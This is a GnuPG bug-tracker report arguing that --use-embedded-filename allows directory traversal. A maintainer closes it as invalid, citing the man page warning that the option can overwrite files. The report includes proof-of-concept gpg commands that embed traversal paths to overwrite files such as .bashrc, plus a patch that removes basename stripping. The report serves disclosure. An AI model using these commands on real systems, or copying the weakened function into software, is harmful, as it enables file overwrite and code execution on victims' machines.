Page MenuHome GnuPG
Create Task
Maniphest T3180

Directory traversal bug
Closed, InvalidPublic
Actions

Description

Directory traversal bug

gpg allows for arbitrary file overwrite anywhere within a file system if a victim decrypts a file using --use-embedded-filename option
This could be exploited to allow for malicious code execution on a victims computer by replacing files such as .bashrc

PoC

Attacker:

$ gpg -er xxxxxxxx --set-filename "..\..\..\..\..\..\Users\AchmeUser\Documents\cv.docx" -o Attachment.gpg ./evilCV.docx

Victim:

C:\Users\AchmeUser\Downloads> gpg --use-embedded-filename Attachment.gpg

The same can be done against a Linux target however gpg by patching util/fileutil.c:make_basename() and not perform strrchr for a directory separators and thus allow / in the file name.

char *
make_basename(const char *filepath, const char *inputpath)
{
	return xstrdup(filepath);
}

Attacker:

$ gpg -er xxxxxxxx --set-filename "../../../../../../home/achmeUser/.bashrc" -o Attachment.gpg ./evilbashrc

Victim:

$ gpg --use-embedded-filename Attachment.gpg

Details

Version
All

Event Timeline

Incanus created this task.May 25 2017, 11:32 AM
werner closed this task as Invalid.May 25 2017, 11:51 AM
werner added a subscriber: werner.

Let me quote from the man page:

--use-embedded-filename
--no-use-embedded-filename
         Try to create a file with a name as embedded in the data. This can be a  dangerous
        option  as it enables overwriting files.  Defaults to no.

This we can't consider this a bug.

Incanus added a comment.EditedMay 25 2017, 12:04 PM

Indeed.
However I am more concerned about the directory traversal, which seems be unintended and unnecessarily dangerous.